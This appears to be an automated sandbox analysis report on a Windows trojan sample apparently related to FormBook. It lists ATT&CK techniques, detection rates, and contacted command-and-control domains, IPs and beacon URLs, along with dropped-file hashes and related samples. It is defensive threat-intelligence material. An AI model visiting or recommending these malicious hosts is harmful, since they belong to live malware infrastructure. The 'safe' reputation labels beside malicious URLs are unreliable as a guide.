Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
J1VpshZJfm.exe	63%	Virustotal		Browse
J1VpshZJfm.exe	79%	ReversingLabs	Win32.Trojan.AutoitInject
J1VpshZJfm.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.newbh.pro/z9pt/?ERYLmh=oYJAeG9WNTlP8utNbygd6NUbjqahrsf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCgtw4AU7Y7avcI6zeRyEIpqmuKn0rd3BmnQw=&X6H8=IvQt7	0%	Avira URL Cloud	safe
http://www.dffmdogmyftftv2e.cyou/oo53/?ERYLmh=w7zSaK21vx4u10sWVMnfmIW6aSu6YucXytn5RpNm+gMsUo2HNotrI4MxDLqt2VVD72DPDfflNvbSi1F9wjFvsc9CjUP+BpgRjgEeDTY+44qn6Defd5ku6J4=&X6H8=IvQt7	0%	Avira URL Cloud	safe
http://www.sql.dance/11n4/	0%	Avira URL Cloud	safe
http://www.valuault.store/nhb9/?ERYLmh=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiDPCXANULjdgkxwmOOUHyZqikvDogiQcXSnY=&X6H8=IvQt7	0%	Avira URL Cloud	safe
http://www.newbh.pro/z9pt/	0%	Avira URL Cloud	safe
http://www.lmueller.dev/w0kg/?ERYLmh=gdZftRfibRTMAdgnKmd9KVRywM/mYMR5KQU/CHcOE1UQTVmABoHrRdFggPQ+NAJ+Xf61Ad5PxgFkNU5U/GGJ56kA4RPcdSHkeJmiJ2vWzoHi2nE9toLKgQQ=&X6H8=IvQt7	0%	Avira URL Cloud	safe
http://www.valuault.store/nhb9/	0%	Avira URL Cloud	safe
http://www.gern.dev/i0t0/	0%	Avira URL Cloud	safe
http://www.qqssii.top/2x3i/?ERYLmh=ozNw7NS3nEOk5LjjCOldIIGkyQfls/9HGmRhrjNi7rrUwaxJWNlgSsqd820yKv/9if09QmpvaDID9eWOlIIxCNIrEjeF8HSt0uqtuoAuwQX7Per/XEdcwbY=&X6H8=IvQt7	0%	Avira URL Cloud	safe
https://error.skycloud.tw/system/error?code=400	0%	Avira URL Cloud	safe
http://www.qqssii.top	0%	Avira URL Cloud	safe
http://www.lmueller.dev/w0kg/	0%	Avira URL Cloud	safe
http://www.gern.dev/i0t0/?X6H8=IvQt7&ERYLmh=55JAKRHCVhRFz4rSCivB82QuzdQ/baakOPrCijpU7kQxygbYqFNZJ0DsoOfetVDx1igJEubFEiJe3C+c5zJONaTpvnJNfmhjgkKiBmVn8klxaL2GeVp9+f4=	0%	Avira URL Cloud	safe
http://www.sql.dance/11n4/?ERYLmh=Q6B4Vv6H/HmLDGJrwI0OhVXjXZHTCh42S0IrLUtTNR3dM5L2Pp6KnadiPCYNEEaz6Rg+ZfDzycGjYNn5/pubR8oyDYBu1hbKKFItG0JEeDKr9yYwr/OIGls=&X6H8=IvQt7	0%	Avira URL Cloud	safe
http://www.qqssii.top/2x3i/	0%	Avira URL Cloud	safe
https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.potorooqr.lol	127.0.0.1	true	false	unknown
www.sql.dance	199.59.243.228	true	true	unknown
www.newbh.pro	176.57.65.76	true	true	unknown
an05-prod-x.cdn-ng.net	103.117.135.13	true	true	unknown
www.gern.dev	185.151.30.223	true	true	unknown
www.lmueller.dev	46.38.243.234	true	true	unknown
www.valuault.store	209.74.79.42	true	true	unknown
www.qqssii.top	198.2.214.227	true	true	unknown
dodowo.shop	112.175.247.179	true	false	unknown
www.vipstargold.buzz	unknown	unknown	false	unknown
www.hwak.live	unknown	unknown	false	unknown
www.omp037621r.vip	unknown	unknown	false	unknown
www.dffmdogmyftftv2e.cyou	unknown	unknown	false	unknown
www.dodowo.shop	unknown	unknown	false	unknown
www.arabhost.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.newbh.pro/z9pt/	true	Avira URL Cloud: safe	unknown
http://www.valuault.store/nhb9/?ERYLmh=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiDPCXANULjdgkxwmOOUHyZqikvDogiQcXSnY=&X6H8=IvQt7	true	Avira URL Cloud: safe	unknown
http://www.dffmdogmyftftv2e.cyou/oo53/?ERYLmh=w7zSaK21vx4u10sWVMnfmIW6aSu6YucXytn5RpNm+gMsUo2HNotrI4MxDLqt2VVD72DPDfflNvbSi1F9wjFvsc9CjUP+BpgRjgEeDTY+44qn6Defd5ku6J4=&X6H8=IvQt7	true	Avira URL Cloud: safe	unknown
http://www.sql.dance/11n4/	true	Avira URL Cloud: safe	unknown
http://www.valuault.store/nhb9/	true	Avira URL Cloud: safe	unknown
http://www.gern.dev/i0t0/	true	Avira URL Cloud: safe	unknown
http://www.qqssii.top/2x3i/?ERYLmh=ozNw7NS3nEOk5LjjCOldIIGkyQfls/9HGmRhrjNi7rrUwaxJWNlgSsqd820yKv/9if09QmpvaDID9eWOlIIxCNIrEjeF8HSt0uqtuoAuwQX7Per/XEdcwbY=&X6H8=IvQt7	true	Avira URL Cloud: safe	unknown
http://www.lmueller.dev/w0kg/?ERYLmh=gdZftRfibRTMAdgnKmd9KVRywM/mYMR5KQU/CHcOE1UQTVmABoHrRdFggPQ+NAJ+Xf61Ad5PxgFkNU5U/GGJ56kA4RPcdSHkeJmiJ2vWzoHi2nE9toLKgQQ=&X6H8=IvQt7	true	Avira URL Cloud: safe	unknown
http://www.newbh.pro/z9pt/?ERYLmh=oYJAeG9WNTlP8utNbygd6NUbjqahrsf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCgtw4AU7Y7avcI6zeRyEIpqmuKn0rd3BmnQw=&X6H8=IvQt7	true	Avira URL Cloud: safe	unknown
http://www.qqssii.top/2x3i/	true	Avira URL Cloud: safe	unknown
http://www.lmueller.dev/w0kg/	true	Avira URL Cloud: safe	unknown
http://www.sql.dance/11n4/?ERYLmh=Q6B4Vv6H/HmLDGJrwI0OhVXjXZHTCh42S0IrLUtTNR3dM5L2Pp6KnadiPCYNEEaz6Rg+ZfDzycGjYNn5/pubR8oyDYBu1hbKKFItG0JEeDKr9yYwr/OIGls=&X6H8=IvQt7	true	Avira URL Cloud: safe	unknown
http://www.gern.dev/i0t0/?X6H8=IvQt7&ERYLmh=55JAKRHCVhRFz4rSCivB82QuzdQ/baakOPrCijpU7kQxygbYqFNZJ0DsoOfetVDx1igJEubFEiJe3C+c5zJONaTpvnJNfmhjgkKiBmVn8klxaL2GeVp9+f4=	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://error.skycloud.tw/system/error?code=400	systeminfo.exe, 00000006.00000002.3432253939.0000000005436000.00000004.10000000.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000002.3431974679.0000000003986000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2193231609.0000000014576000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	systeminfo.exe, 00000006.00000002.3433664860.0000000007610000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3432253939.0000000005A7E000.00000004.10000000.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000002.3431974679.0000000003FCE000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.qqssii.top	UNUqLBRwwpkr.exe, 00000009.00000002.3433411513.00000000058A0000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1	UNUqLBRwwpkr.exe, 00000009.00000002.3431974679.00000000042F2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.117.135.13	an05-prod-x.cdn-ng.net	China	137218	KYIT-AS-APKuaiyunInformationTechnologyCOLtdCN	true
176.57.65.76	www.newbh.pro	Bosnia and Herzegowina	47959	TELINEABA	true
198.2.214.227	www.qqssii.top	United States	54600	PEGTECHINCUS	true
209.74.79.42	www.valuault.store	United States	31744	MULTIBAND-NEWHOPEUS	true
199.59.243.228	www.sql.dance	United States	395082	BODIS-NJUS	true
185.151.30.223	www.gern.dev	United Kingdom	48254	TWENTYIGB	true
46.38.243.234	www.lmueller.dev	Germany	197540	NETCUP-ASnetcupGmbHDE	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587952
Start date and time:	2025-01-10 19:49:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	J1VpshZJfm.exe renamed because original name is a hash value
Original Sample Name:	f1a074590a5ab17256abba47cb364ef182c4082f08d63a22f0cb21f438f72aa1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/3@21/8
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 85% Number of executed functions: 49 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
209.74.79.42	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.valuault.store/nhb9/
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	www.glowups.life/o8f4/
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	www.primespot.live/icu6/
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	www.glowups.life/dheh/
	72STaC6BmljfbIQ.exe	Get hash	malicious	FormBook	Browse	www.primespot.live/b8eq/
199.59.243.228	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.969-usedcar02.shop/cfcv/
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.marketyemen.holdings/8efo/
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	ww7.fwiwk.biz/tlrsmavbccvnwuep?usid=25&utid=8703410598
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.dating-apps-az-dn5.xyz/pn0u/?xP7x=jGu0qTD/ksVhc8OTP4HC7zBU+1XTPuzc0Uy7xFC8PHDlZ2G4sa+fF6flpU/b3trkgDVJnaEHcK2UYYJju1sH3kzyJpZIX8bfuxajpqPIVOEtPxAfDoAlEB0=&F4=Q0yHy
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.deadshoy.tech/m5bf/
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.marketyemen.holdings/nmrk/
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	www.sql.dance/gott/
	NpHauDPoR8.exe	Get hash	malicious	Unknown	Browse	utbidet-ugeas.biz/d/N?0254B6262954B626297AB60A2954B60E91509A04ED55B6E68156B2100766981F1B64860829
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.denture-prices.click/dx3i/
46.38.243.234	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.lmueller.dev/z8lg/
	Outstanding Invoices Spreadsheet Scan 00495_PDF.exe	Get hash	malicious	FormBook	Browse	www.dlion.net/zdtk/
	New Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.soussecloud.com/a2c8/?6lbL=qTfTz0&Djf=Le51HqdCnUjRonUOENSF5PHY57eFe7/AO9vFjh8TXkRU4Y1PyjhZUj1LAkJkXoaSSV0M
	nowy przyk#U0142adowy katalog.exe	Get hash	malicious	FormBook	Browse	www.alles-abgedeckt.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA==
	7TupDHKAwm.exe	Get hash	malicious	FormBook	Browse	www.amazonretoure.net/s18y/?oVJ4Hplp=C+VjjyIyz5JhIAiSdyGuho+nJXOtpZEvhjPesU35WHH5HFWifcx9eas6lvx4xbPC6vhC&TlZlo=3fdTDXLHN2n
	9LjOeq9jnl.exe	Get hash	malicious	FormBook	Browse	www.qumpan.com/shjn/?UTqtRv=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABbTrmmBq9f&Whc=0DHdArEp5hQd
	OApfyh3Vfm.exe	Get hash	malicious	FormBook	Browse	www.qumpan.com/shjn/?BZXds2=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABxMbWmFo1f&jlW=5jIhet3

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.lmueller.dev	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	46.38.243.234
www.sql.dance	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
www.sql.dance	bestimylover.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	199.59.243.227
www.valuault.store	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	209.74.79.42

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KYIT-AS-APKuaiyunInformationTechnologyCOLtdCN	http://www.fotoschuppen.net/	Get hash	malicious	Unknown	Browse	103.117.134.21
	https://www.bzqmgs.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
	https://www.exactcollisionllc.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
	https://www.exactcollisionllc.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
	https://www.exactcollisionllc.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
	https://www.exactcollisionllc.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
	https://www.exactcollisionllc.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
	https://www.exactcollisionllc.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
	https://www.0769qilin.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
	http://www.bitdefenderlogin.com/	Get hash	malicious	Unknown	Browse	103.117.134.21
TELINEABA	belks.arm.elf	Get hash	malicious	Mirai	Browse	88.214.61.247
	belks.mpsl.elf	Get hash	malicious	Mirai	Browse	88.214.61.239
	na.elf	Get hash	malicious	Mirai	Browse	88.214.61.214
	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	176.57.64.102
	220204-TF1--00.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	20-EM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	RFQ STR-160-01.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	176.57.64.102
	031215-Revised-01.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	Copy of 01. Bill of Material - 705.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
MULTIBAND-NEWHOPEUS	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	rQuotation.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	209.74.64.189
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	209.74.79.41
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	209.74.64.58
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
PEGTECHINCUS	frosty.x86.elf	Get hash	malicious	Mirai	Browse	45.205.88.140
	sora.arm7.elf	Get hash	malicious	Unknown	Browse	154.195.146.220
	empsl.elf	Get hash	malicious	Mirai	Browse	156.243.156.233
	garm.elf	Get hash	malicious	Mirai	Browse	156.247.76.163
	garm5.elf	Get hash	malicious	Mirai	Browse	156.247.76.117
	earm5.elf	Get hash	malicious	Mirai	Browse	156.243.156.211
	earm.elf	Get hash	malicious	Mirai	Browse	156.247.76.154
	goarm.elf	Get hash	malicious	Mirai	Browse	156.243.156.212
	eppc.elf	Get hash	malicious	Mirai	Browse	156.243.156.246
	arm5.elf	Get hash	malicious	Mirai	Browse	108.186.219.240

Process:	C:\Windows\SysWOW64\systeminfo.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209935793793442
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
MD5:	214CFA91B0A6939C4606C4F99C9183B3
SHA1:	A36951EB26E00F95BFD44C0851827A032EAFD91A
SHA-256:	660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
SHA-512:	E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autC5A6.tmp

Download File

Process:	C:\Users\user\Desktop\J1VpshZJfm.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.9958295093287886
Encrypted:	true
SSDEEP:	6144:3mMVXiJbbD7dXiz9rRFCoANlV+OM6CzEtglAARW3Ov8gss8rA+9v7L:2MZihbDReRv/ANH+O3iKPU+OvgsXQ7L
MD5:	8A769DCCAA7480EFF7228B85438D64F4
SHA1:	BED862B6F5B16C280E1197EDC74A9A287A3F9C29
SHA-256:	6BF708F2C945152FDDDFD1BCACC7F970F2326050C30C0DDED0B0F24B57DA81D6
SHA-512:	5D7DCE27234030BF4EEEB9328A5DDAAEF261001EBA44A6A714A559FFC6C63B870420AAF67B981F830EAE8164E931A0C778133DD91BEF6EEDA6BD093A1D672AAA
Malicious:	false
Preview:	...Q;KYD3QV7..1S.UVVMAEX.BSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8K.D7QX(.71.Q.w.L..y.::k<#W,+%Zq5V$W^'x73v?4+x1,s...qU$=!.\[=n91SXUVV4@L.e"4.v,6.v9#.K..Q4.O...}%?.X..p1_..-T9kW-.1SXUVVMA..XB.HJL.9k.D7QV7J91.XWW]LJEX.FSIKLQ8KYD.BV7J)1SX5RVMA.XXRSIKNQ8MYD7QV7J?1SXUVVMA%\XBQIKLQ8K[Dw.V7Z91CXUVV]AEHXBSIKLA8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSg?))LKYD..R7J)1SX.RVMQEXXBSIKLQ8KYD7qV791SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSI

C:\Users\user\AppData\Local\Temp\reenlarge

Download File

Process:	C:\Users\user\Desktop\J1VpshZJfm.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.9958295093287886
Encrypted:	true
SSDEEP:	6144:3mMVXiJbbD7dXiz9rRFCoANlV+OM6CzEtglAARW3Ov8gss8rA+9v7L:2MZihbDReRv/ANH+O3iKPU+OvgsXQ7L
MD5:	8A769DCCAA7480EFF7228B85438D64F4
SHA1:	BED862B6F5B16C280E1197EDC74A9A287A3F9C29
SHA-256:	6BF708F2C945152FDDDFD1BCACC7F970F2326050C30C0DDED0B0F24B57DA81D6
SHA-512:	5D7DCE27234030BF4EEEB9328A5DDAAEF261001EBA44A6A714A559FFC6C63B870420AAF67B981F830EAE8164E931A0C778133DD91BEF6EEDA6BD093A1D672AAA
Malicious:	false
Preview:	...Q;KYD3QV7..1S.UVVMAEX.BSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8K.D7QX(.71.Q.w.L..y.::k<#W,+%Zq5V$W^'x73v?4+x1,s...qU$=!.\[=n91SXUVV4@L.e"4.v,6.v9#.K..Q4.O...}%?.X..p1_..-T9kW-.1SXUVVMA..XB.HJL.9k.D7QV7J91.XWW]LJEX.FSIKLQ8KYD.BV7J)1SX5RVMA.XXRSIKNQ8MYD7QV7J?1SXUVVMA%\XBQIKLQ8K[Dw.V7Z91CXUVV]AEHXBSIKLA8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSg?))LKYD..R7J)1SX.RVMQEXXBSIKLQ8KYD7qV791SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSIKLQ8KYD7QV7J91SXUVVMAEXXBSI

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.170278224870213
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	J1VpshZJfm.exe
File size:	1'276'928 bytes
MD5:	21e2a1f6597267e8bbda9239986a5df4
SHA1:	5d952371ef4d3f6b0a861c7b5fb28e19ca588b24
